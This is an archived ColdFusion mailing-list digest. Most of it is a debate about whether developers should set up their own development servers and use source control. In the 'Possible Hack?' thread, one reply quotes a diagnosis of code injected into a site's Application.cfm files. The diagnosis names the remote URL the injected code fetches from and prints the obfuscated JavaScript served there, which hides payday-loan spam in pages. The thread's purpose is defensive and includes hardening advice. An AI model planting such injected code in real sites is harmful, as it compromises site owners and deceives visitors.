RE: Possible Hack?
http://www.adobe.com/support/security/bulletins/apsb13-03.html This is the recent fix that effected many of our servers. Which lead to many sites (and vps) with that compromise. When Hosting.com (our parent company) sent the notification to their customers there was no hot fix. Our (Hostmysite) admins setup server wide url rewrite rules on our shared servers to restrict CFIDE until a patch was in place. It apparently was the no RDS password (even though disabled) that caused our issue. At least we think. Byron Mann Lead Engineer & Architect HostMySite.com ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354250 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Source control in CF
> Would I expect my chauffeur to be able to diagnose a flat tire and change it? > Absolutely. > Would I expect him to be able to diagnose and fix a problem in the engine > management system? Absolutely not. There's a potentially large range of items between those two. I think you would find that most professional drivers are actually pretty good at simple car repairs. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ http://training.figleaf.com/ Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on GSA Schedule, and provides the highest caliber vendor-authorized instruction at our training centers, online, or onsite. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354249 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Source control in CF
> I personally disagree, respectfully of course, with the people who say, that > developers should be able to maintain > CF and web server, as well as set up 3rd party components etc. To me, that is > like saying that any developer > should be able to set up a database server, know how DNS functions etc. > > While I would agree, that knowing some of these things could be beneficial > for a developer from time to time, I feel > that developers should be specialists who focus solely on developing - not on > server maintenance. I have to disagree with practically everything you've written here. In my experience, many web developers simply do not know enough about their development stack - which includes all of the items you've mentioned. You don't have to be an expert at configuring a database server or managing DNS, but I can't count the enormous number of times my knowledge of both of those has saved countless hours debugging problems. Your applications don't live in a vacuum - they interact with all of these things. If you don't know how they work, how will you identify problems that aren't directly in your CF code? Here's an extreme example. Many years ago, I was helping some CF developers who were building an application that relied on custom functionality in the browser - a Netscape browser plugin, to be exact. This plugin was written in C++. The developer of the plugin worked offsite, and had the plugin working on her development environment. The CF guys couldn't get it to work on their development environment, though, and had been fighting with it for several months. It turns out that the offsite development environment had debug libraries, and the local one did not - it was as simple as that. Countless hours were shot to hell because nobody on the CF team knew how to check for dependencies, because it was "outside their scope". I fortunately knew how to do this, I did it and discovered the problem the first day I was there. Many years ago, when I was in the military, I drove a tank. But I also learned how to be a gunner, loader, and tank commander - not because I would have to do those things regularly, but because a good driver has to know how those other jobs work in order to do his own job. Now, to wrap this up, I did say "practically everything". I don't think you have to be an expert on server maintenance. But you have to know the basics on how all the components in your application stack work. And for that matter, there are very few experts on CF server maintenance who aren't CF developers. If you ask the average server administrator how best to manage CF, you're probably going to get a blank stare in response. Hell, I developed a class for CF administration for this very reason - I ran into so many clients who simply didn't know what they were doing (and this remains the case to this very day). Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ http://training.figleaf.com/ Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on GSA Schedule, and provides the highest caliber vendor-authorized instruction at our training centers, online, or onsite. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354248 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
RE: Source control in CF
With most of the jobs I have had (Here in the US), web developers usually are not only the developers, but also the DBA, sys admin, network admin, project manager, etc... Eric -Original Message- From: Michael Christensen [mailto:mich...@strib.dk] Sent: Saturday, February 02, 2013 6:11 PM To: cf-talk Subject: Re: Source control in CF @Russ I can certainly tell, that we have very different views as to which constitutes a quote-unquote developer. In keeping with the automotive analogies, I feel that what Raymond is essentially saying, is that he would not hire you to drive a car, unless you were a mechanic. I feel differently about this, as I would rather hire a chauffeur to drive me around than a mechanic - but this is my personal preference of course. Would I expect my chauffeur to be able to diagnose a flat tire and change it? Absolutely. Would I expect him to be able to diagnose and fix a problem in the engine management system? Absolutely not. In the same way I personally feel, that although a developer should know (or be able to deduce) about potential security issues like the ones you describe, I would not expect him to know about all the internals of the server. If nothing else, I think we can safely say, that Mr. Camden would not employee me, as I would much rather leave setting up servers and the likes, to those who specialize in precisely that :) (oh and on a side note, I find it very interesing to learn about the obviously different views expressed in this thread - gives a man something to ponder) ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354247 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Source control in CF
On Sat, Feb 2, 2013 at 6:26 PM, Michael Christensen wrote: > > I admit, there may be every chance that the reason why I don't agree with > you is that A) I am not used to an environment in which developers develop > locally I'd say that's a really good reason for you to have previously not agreed with the notion of a developer being able to configure his/her own **development** environment - you had (apparently) never seen or heard of it before. However, I think that's a terrible excuse to completely discount the notion now that it has been presented to you. > or (perhaps more frighteningly) B) I am just not very bright. > I doubt that. Lazy, perhaps? I might could see how you could say that, but my bet is you're not exactly "stoopid". ;-) > > I am always willing to learn and expand my horizon though, so could you > perhaps briefly explaine, why you consider it necessary for a developer to > be able to set up sites on an Apache or IIS? (I assume it's not just for > the sheer practicality of it - so that you don't have to wait around for > the IT dept.) > In my opinion, it is unthinkable to call oneself a developer and yet have no clue how to configure your own ***development*** environment. The key here is **DEVELOPMENT** environment. Like Ray, I would never hire - or recommend for hire - someone to fill a developer's role if they were unable to configure their own **development** environment. There are many, many, many reasons for that, and saving the IT department time is probably least among those reasons. - To be a developer, one has to be able to configure a **development** environment for oneself to work in. If one can't do that, then one can't develop. Development _requires_ basic understanding of how things work. It doesn't matter if you're talking web development, desktop development, rocket development, landscape development, or any other kind of development. Basic understanding of the environment one is developing for is absolutely required. - If someone calls themselves a "developer", then I fully EXPECT them to not just copy/paste/churn "code" for whatever project I've placed them on, but to also tinker and play and be in a constant state of learning, even on their own time. If they aren't doing that, then they are simply here to be babysat and collect a check. I don't believe in babysitting or paying for people to be babysat. :-) - One cannot truly progress as a developer if one cannot build their own **development** environment. If they're dependent upon someone else to configure their **development** environment, then they're stuck with whatever they're given and will never venture outside that to see what else is out there. And I assure you, "seeing what else is out there" is paramount to growing and becoming better at what you do. I tried to boil it down in just a few points, but there are many reasons why one MUST be able to configure their own **development** environment. This thread is filled with them. By the way, hopefully readers of this post have noticed a recurring theme: **development** environment. In no way, shape, or form, do I expect a developer to be able to set up and monitor/maintain a _production_ environment. That is an entirely different animal, and is best left to those who specialize in (and enjoy!) the server management of things. Having said that, I believe that it is a natural progression for a developer to learn how to set up and maintain a server. I just don't expect them to do that as part of their development duties. HTH ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354246 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Source control in CF
If I may, I think there are some core concept differences between Michaels scenario and the others. What I am seeing in your questions and responses points to a corporate structure where "development" is not a part of "IT". Correct me if I'm wrong there. In many cases the structure is different, with the two being the same with different roles but supporting each other. IT (or server admins) taking care of the hardware, patches, and environment but leaving the development environment to the developers themselves. It's a subtle difference but one that helps lessen the load and increase the skillset of the dev team. Also consider solo developers who have to do it all. I have been in all three situations and will never go back to the first. When I was first getting started I didn't know anything about servers. I learned as much as I could from whatever sources I could, especially this list, and now I can not only plan and build applications but also set up both internal and external servers and deal with the management issues that come up. So the "right" answer comes down to not only how you need to handle this situation but also how your company structure is and how much you want to increase the skills of your development team. Hatton ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354245 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Source control in CF
setting up and managing servers is quite different to having a clue about how your app works and some basic web server knowledge. A developer certainly does not need to know the former, but he should at least have a clue about his own development environment and be able to set it up as close as the live environment as possible. A developer is not really like chauffeur, a web designer would probably fit that analogy better, a developer is more like the mechanic. Without some basic understanding of how things work under the hood, both the mechanic and the developer will be relying on a lot of guesswork and luck. You cannot rely on systems admins as they are not developers, so you will just end up in a "its your code", "no its your server" argument, with neither having enough knowledge to prove otherwise. There is only so many times you can tell your client "change hosts, they suck", before they are going to notice a pattern. On Sun, Feb 3, 2013 at 12:11 AM, Michael Christensen wrote: > > @Russ > > I can certainly tell, that we have very different views as to which > constitutes a quote-unquote developer. > > In keeping with the automotive analogies, I feel that what Raymond is > essentially saying, is that he would not hire you to drive a car, unless > you were a mechanic. > I feel differently about this, as I would rather hire a chauffeur to drive > me around than a mechanic - but this is my personal preference of course. > > Would I expect my chauffeur to be able to diagnose a flat tire and change > it? Absolutely. > Would I expect him to be able to diagnose and fix a problem in the engine > management system? Absolutely not. > > In the same way I personally feel, that although a developer should know > (or be able to deduce) about potential security issues like the ones you > describe, I would not expect him to know about all the internals of the > server. > > If nothing else, I think we can safely say, that Mr. Camden would not > employee me, as I would much rather leave setting up servers and the likes, > to those who specialize in precisely that :) > > (oh and on a side note, I find it very interesing to learn about the > obviously different views expressed in this thread - gives a man something > to ponder) > > ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354244 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Source control in CF
I admit, there may be every chance that the reason why I don't agree with you is that A) I am not used to an environment in which developers develop locally or (perhaps more frighteningly) B) I am just not very bright. I am always willing to learn and expand my horizon though, so could you perhaps briefly explaine, why you consider it necessary for a developer to be able to set up sites on an Apache or IIS? (I assume it's not just for the sheer practicality of it - so that you don't have to wait around for the IT dept.) ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354243 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Source control in CF
No what Ray is saying is that a developer should be able to turn the car on and drive it, but to maintain the car you need professional help with it. Michael I think you need to stop for a minute, a developer should know there way around the Administrator, they should also know how to add sites to Apache and IIS and be able to install software, but to luck it down and fully secure it, then yes leave that to those who know and developer machines don't need that. And if they are exposed to the internet then you have more bigger issues than you comparisons listed below. -- Regards, Andrew Scott WebSite: http://www.andyscott.id.au/ Google+: http://plus.google.com/113032480415921517411 On Sun, Feb 3, 2013 at 11:11 AM, Michael Christensen wrote: > > @Russ > > I can certainly tell, that we have very different views as to which > constitutes a quote-unquote developer. > > In keeping with the automotive analogies, I feel that what Raymond is > essentially saying, is that he would not hire you to drive a car, unless > you were a mechanic. > I feel differently about this, as I would rather hire a chauffeur to drive > me around than a mechanic - but this is my personal preference of course. > > Would I expect my chauffeur to be able to diagnose a flat tire and change > it? Absolutely. > Would I expect him to be able to diagnose and fix a problem in the engine > management system? Absolutely not. > > In the same way I personally feel, that although a developer should know > (or be able to deduce) about potential security issues like the ones you > describe, I would not expect him to know about all the internals of the > server. > > If nothing else, I think we can safely say, that Mr. Camden would not > employee me, as I would much rather leave setting up servers and the likes, > to those who specialize in precisely that :) > > (oh and on a side note, I find it very interesing to learn about the > obviously different views expressed in this thread - gives a man something > to ponder) > > ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354242 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Source control in CF
@Russ I can certainly tell, that we have very different views as to which constitutes a quote-unquote developer. In keeping with the automotive analogies, I feel that what Raymond is essentially saying, is that he would not hire you to drive a car, unless you were a mechanic. I feel differently about this, as I would rather hire a chauffeur to drive me around than a mechanic - but this is my personal preference of course. Would I expect my chauffeur to be able to diagnose a flat tire and change it? Absolutely. Would I expect him to be able to diagnose and fix a problem in the engine management system? Absolutely not. In the same way I personally feel, that although a developer should know (or be able to deduce) about potential security issues like the ones you describe, I would not expect him to know about all the internals of the server. If nothing else, I think we can safely say, that Mr. Camden would not employee me, as I would much rather leave setting up servers and the likes, to those who specialize in precisely that :) (oh and on a side note, I find it very interesing to learn about the obviously different views expressed in this thread - gives a man something to ponder) ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354241 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Source control in CF
One of the primary reasons a developer should have a clue what happens on the server is so they can actually debug and diagnose problems instead of saying to their client/boss "it must be the hosts fault, lets get a new host", which is hardly ever the cause of the problem. I have seen plenty of devs make such suggestions to others as well with no basis. A complete lack of understanding of server security can also cause untold issues, with apps being insecure, or again assuming problems with the host. The number of times I have seen people say they need a host who allows cfexecute, or allows cfile to read/write anywhete on the aerver, completely oblivious of what a huge security issue this is. Just last week we had a customer who wanted remote desktop access to a shared server and the ability to upload dll's, and this was coming from their developer. I can honestly say that most devs we deal with have absolutely no idea what goes on beyond ftping their files to the server, everything beyond this is a black box to them. Its rather like being a mechanic but saying i just fix em, but I have no idea how the engine works. Regards Russ Michaels www.michaels.me.uk www.cfmldeveloper.com - Free CFML hosting for developers www.cfsearch.com - CF search engine ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354240 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Source control in CF
On Sat, Feb 2, 2013 at 3:33 PM, Michael Christensen wrote: > I personally disagree, respectfully of course, with the people who say, > that developers should be able to maintain CF and web server, as well as > set up 3rd party components etc. To me, that is like saying that any > developer should be able to set up a database server, know how DNS > functions etc. > Personally, I would consider any developer who 1) could not setup a database server and 2) does not have a solid understanding of DNS to be fairly unemployable. Different organizations have different standards, but I can't even imagine where I would start to find a "developer" who doesn't know how to setup a database server. -Cameron ... ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354239 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Source control in CF
Hard evidence, I will give you the worst case scenario. Joe has opened a file and begun working on a file, in your current setup that means the file will be locked from other developers, now he has gone to lunch and within 5 minutes another developer needs to make changes to that file. While one developer waits for Joe to return he can't test his changes, as he is waiting for that one file to be unlocked to finish his current task. Also, when developers are modifying off the same code base on the same server, developers tend to introduce problems to other developers and they end up trying to fix phantom bugs or spend time finding a problem that just magically goes away when the the other developer realizes that he screwed up. I could go on and on, but that last one is the worst one of them all. There is nothing worse than trying to fix something that another developer introduced and then fixed and sent you trying to see what you did wrong only to find out that the other developer later fixed it. Yes this does still happen in a revision control system, but rule of thumb is that any code should not be committed until the developer has fixed the code and ran his/her unit tests and once they have merged and and tested again then they should commit the completed task back to the source repository. Seriously I think you should have a good think about this for a minute or maybe five, I had the same argument with a job I worked in some time ago. Where I was chasing phantom bugs and wasting my time fixing things in a similar situation, and the testers also testing on this, means they report bugs that really aren't there, makes for so much loss of productivity it is not funny. -- Regards, Andrew Scott WebSite: http://www.andyscott.id.au/ Google+: http://plus.google.com/113032480415921517411 ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354238 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Source control in CF
>Michael, I've noticed you, and others, have mentioned server maintenance. >To be clear, I think there is a -far- difference between someone who is an >expert in Apache and IIS tuning and someone double clicking to install >Apache. I don't think developers should be fine tuning Apache, or DB >servers. But they *should* be able to run a visual installer and accept the >defaults. I run MySQL and SQL Server just fine. I don't consider myself >even close to being a DBA, but I can make a database and tables and that >should be good enough I'd say. > > Raymond, I absolutely agree, that we must discern between developers being able to do simple point-and-click installs and configurations - and them been able to do deep-level server analysis and tuning. And you are absolutely right, developers should know about databases and tables, and be able to create tables using the correct datatypes, relations, constraints etc. But I also understand, why the IT department might impose restrictions as to who is able to do what (we cannot, for example, create new databases ourselves - only the IT department can do that). They are the ones who are ultimately held responsible for the performance, stability and security of the servers (not the code that we write) - and I understand that them imposing restrictions can aid in that. But like I wrote in response to Andrew's comments - if I was to setup development anew tomorrow, I would probably also favor a setup where each developer can develop locally, without it interfering with other developers. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354237 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Source control in CF
@Andrew >Most developers should know how to install ColdFusion, it is dead simple to >begin with, maintaining it well that is another story. If your premise is that we are talking about developers who are running a setup where each person has a local CF server on his/her machine, then I would agree that it might very well be beneficial for developers to be able to diagnose and fix issues with their own server, without having to wait for the IT department. >Lost productivity is worse when all developers share and code off the same >server, whether you want to believe that or not. But like you said it was >5-6 years ago, so a revisit might be a good thing. If you are talking from personal experience, having run both types of setups in parallel (either at the same time or at least under as similar conditions as possible, in terms of time, tasks, complexity etc) - then this is indeed valuable insight. However, if I went to my CEO with such a broad and general claim, he would immediately demand that I back it up with hard evidence - which I would have a terrible time doing. Without concrete evidence, I don't know how I would lobby in favor of the company spending the time and money, in changing our current setup. With that being said, if I was to setup up development from scratch tomorrow and I could choose either of the two setups (the current setup was already firmly in place when I joined the company in 2005) - I would probably also favor the setup where each developer runs his/her own server and can develop locally. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354236 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Source control in CF
Michael, I've noticed you, and others, have mentioned server maintenance. To be clear, I think there is a -far- difference between someone who is an expert in Apache and IIS tuning and someone double clicking to install Apache. I don't think developers should be fine tuning Apache, or DB servers. But they *should* be able to run a visual installer and accept the defaults. I run MySQL and SQL Server just fine. I don't consider myself even close to being a DBA, but I can make a database and tables and that should be good enough I'd say. On Sat, Feb 2, 2013 at 2:33 PM, Michael Christensen wrote: > > Good tips about developers being able to run software under other > licensing rules - I did not think that one through fully I can see now. > > I personally disagree, respectfully of course, with the people who say, > that developers should be able to maintain CF and web server, as well as > set up 3rd party components etc. To me, that is like saying that any > developer should be able to set up a database server, know how DNS > functions etc. > > While I would agree, that knowing some of these things could be beneficial > for a developer from time to time, I feel that developers should be > specialists who focus solely on developing - not on server maintenance. > > I don't know if this might be a cultural difference (in terms of how > things are done) - me being Danish personally - but in all places I've > worked the last 10 years, the IT department has done most of the > configuration and maintenance of developer machines. Not that there is > necessarily anything wrong with developers setting things up themselves, > but I understand (from the company's perspective) how it can be beneficial > to have these things centralized. > > Following the previous inputs in this thread, I went digging in my old > emails and it turns out (I had completely forgotten about this) that we did > indeed talk about switching over from shared resources, to each developer > running their own complete setup. The plans were eventually dropped, as it > was deemed too expensive (in terms of lost productivity) and adding an > additional layer of complexity in terms of maintenance. > > This was back in 2007 and perhaps it is time to revisit this once more. > You guys' passionate arguments for this approach has certainly given me > some food for thought and I will take this up with my colleagues in the > near future. > > ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354235 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Source control in CF
Michael, Most developers should know how to install ColdFusion, it is dead simple to begin with, maintaining it well that is another story. But what interests me is this statement *The plans were eventually dropped, as it was deemed too expensive (in terms of lost productivity) and adding an additional layer of complexity in terms of maintenance.* Lost productivity is worse when all developers share and code off the same server, whether you want to believe that or not. But like you said it was 5-6 years ago, so a revisit might be a good thing. -- Regards, Andrew Scott WebSite: http://www.andyscott.id.au/ Google+: http://plus.google.com/113032480415921517411 On Sun, Feb 3, 2013 at 7:33 AM, Michael Christensen wrote: > > Good tips about developers being able to run software under other > licensing rules - I did not think that one through fully I can see now. > > I personally disagree, respectfully of course, with the people who say, > that developers should be able to maintain CF and web server, as well as > set up 3rd party components etc. To me, that is like saying that any > developer should be able to set up a database server, know how DNS > functions etc. > > While I would agree, that knowing some of these things could be beneficial > for a developer from time to time, I feel that developers should be > specialists who focus solely on developing - not on server maintenance. > > I don't know if this might be a cultural difference (in terms of how > things are done) - me being Danish personally - but in all places I've > worked the last 10 years, the IT department has done most of the > configuration and maintenance of developer machines. Not that there is > necessarily anything wrong with developers setting things up themselves, > but I understand (from the company's perspective) how it can be beneficial > to have these things centralized. > > Following the previous inputs in this thread, I went digging in my old > emails and it turns out (I had completely forgotten about this) that we did > indeed talk about switching over from shared resources, to each developer > running their own complete setup. The plans were eventually dropped, as it > was deemed too expensive (in terms of lost productivity) and adding an > additional layer of complexity in terms of maintenance. > > This was back in 2007 and perhaps it is time to revisit this once more. > You guys' passionate arguments for this approach has certainly given me > some food for thought and I will take this up with my colleagues in the > near future. > > ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354234 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Source control in CF
Good tips about developers being able to run software under other licensing rules - I did not think that one through fully I can see now. I personally disagree, respectfully of course, with the people who say, that developers should be able to maintain CF and web server, as well as set up 3rd party components etc. To me, that is like saying that any developer should be able to set up a database server, know how DNS functions etc. While I would agree, that knowing some of these things could be beneficial for a developer from time to time, I feel that developers should be specialists who focus solely on developing - not on server maintenance. I don't know if this might be a cultural difference (in terms of how things are done) - me being Danish personally - but in all places I've worked the last 10 years, the IT department has done most of the configuration and maintenance of developer machines. Not that there is necessarily anything wrong with developers setting things up themselves, but I understand (from the company's perspective) how it can be beneficial to have these things centralized. Following the previous inputs in this thread, I went digging in my old emails and it turns out (I had completely forgotten about this) that we did indeed talk about switching over from shared resources, to each developer running their own complete setup. The plans were eventually dropped, as it was deemed too expensive (in terms of lost productivity) and adding an additional layer of complexity in terms of maintenance. This was back in 2007 and perhaps it is time to revisit this once more. You guys' passionate arguments for this approach has certainly given me some food for thought and I will take this up with my colleagues in the near future. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354233 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Possible Hack?
> Yeah I had figured out what the code did. My main concern is figuring out how > they did it and preventing it in the future. I > had already done the lockdown stuff many months ago which is why I am kind of > baffled. I checked the FTP logs and see > nothing in there for those files so the attack would have most likely come in > via CF somewhere. Does the CF server have permission to write to .cfm files? Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ http://training.figleaf.com/ Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on GSA Schedule, and provides the highest caliber vendor-authorized instruction at our training centers, online, or onsite. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354232 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
RE: Possible Hack?
Yeah our host Hosting.com sent out an email about those vulnerabilities and we applied the hotfixes for those already. About 6 weeks ago I think. The only thing I can think of is the cfide is setup as a virtual directory for these sites so they can use things like the FCKEditor etc. Is there another way to enable the use of things like that without just setting the CFIDE directory as a virtual directory for the entire site? -Original Message- From: Russ Michaels [mailto:r...@michaels.me.uk] Sent: Saturday, February 02, 2013 11:58 AM To: cf-talk Subject: Re: Possible Hack? you should also check that you have all the hotfixes installed, especially recent ones which plugged a vulnerability that would allow attackers to upload files, which has been blogged and tweeted a lot. check your FTP logs for any hacked ftp accounts. A general security scan against your server would be a good idea. As well as http://hackmycf.com/ On Sat, Feb 2, 2013 at 4:48 PM, Dave Watts wrote: > > > I noticed my CF server started timing out a lot lately. Then I looked at > the code and on the Application.cfm page at the > > top was this code that I didn't put there. Anybody know what this is and > how it might have gotten on the Application.cfm > > pages of the sites on this VPS? Not sure how it got there. Any help in > plugging this hole would be appreciated. > > The code fetches your page, outputs it, then fetches something from > somewhere else and outputs that also. > > The "somewhere else" is this URL: > > http://199.19.94.194/cfset2.txt > > The content of that URL is: > > function zdrViewState() > { > var a=0,m,v,t,z,x=new > > Array('9091968376','88879181928187863473749187849392773592878834218896','9977918890','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a]; > t=z=''; > for(v=0;vif(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a); > t='';}}x[l-a]=z;}document.write('<'+x[0]+' > '+x[4]+'>.'+x[2]+'{'+x[1]+'}'+x[0]+'>');}zdrViewState(); > > > followed by a snippet of spam for payday loans. > > There are many things that could have allowed this to be injected. I > recommend that you configure CF to run as a specific user account, and > give that user account read/execute permissions to your CF files. By > default, CF runs as SYSTEM on Windows, which has full control of all > local files. It doesn't need this level of permissions. Doing this > won't close the vulnerability used to inject the code in the first > place, but it will prevent it from doing anything. > > Then, once you've done that, read the CF 9 Lockdown Guide and follow > its instructions as best you can. You should do this as a matter of > course for any CF server install. > > > http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/91025512-cf9-lockdownguide-wp-ue.pdf > > Dave Watts, CTO, Fig Leaf Software > http://www.figleaf.com/ > http://training.figleaf.com/ > > Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on > GSA Schedule, and provides the highest caliber vendor-authorized > instruction at our training centers, online, or onsite. > > ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354231 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Possible Hack?
you should also check that you have all the hotfixes installed, especially recent ones which plugged a vulnerability that would allow attackers to upload files, which has been blogged and tweeted a lot. check your FTP logs for any hacked ftp accounts. A general security scan against your server would be a good idea. As well as http://hackmycf.com/ On Sat, Feb 2, 2013 at 4:48 PM, Dave Watts wrote: > > > I noticed my CF server started timing out a lot lately. Then I looked at > the code and on the Application.cfm page at the > > top was this code that I didn't put there. Anybody know what this is and > how it might have gotten on the Application.cfm > > pages of the sites on this VPS? Not sure how it got there. Any help in > plugging this hole would be appreciated. > > The code fetches your page, outputs it, then fetches something from > somewhere else and outputs that also. > > The "somewhere else" is this URL: > > http://199.19.94.194/cfset2.txt > > The content of that URL is: > > function zdrViewState() > { > var a=0,m,v,t,z,x=new > > Array('9091968376','88879181928187863473749187849392773592878834218896','9977918890','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a]; > t=z=''; > for(v=0;vif(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a); > t='';}}x[l-a]=z;}document.write('<'+x[0]+' > '+x[4]+'>.'+x[2]+'{'+x[1]+'}'+x[0]+'>');}zdrViewState(); > > > followed by a snippet of spam for payday loans. > > There are many things that could have allowed this to be injected. I > recommend that you configure CF to run as a specific user account, and > give that user account read/execute permissions to your CF files. By > default, CF runs as SYSTEM on Windows, which has full control of all > local 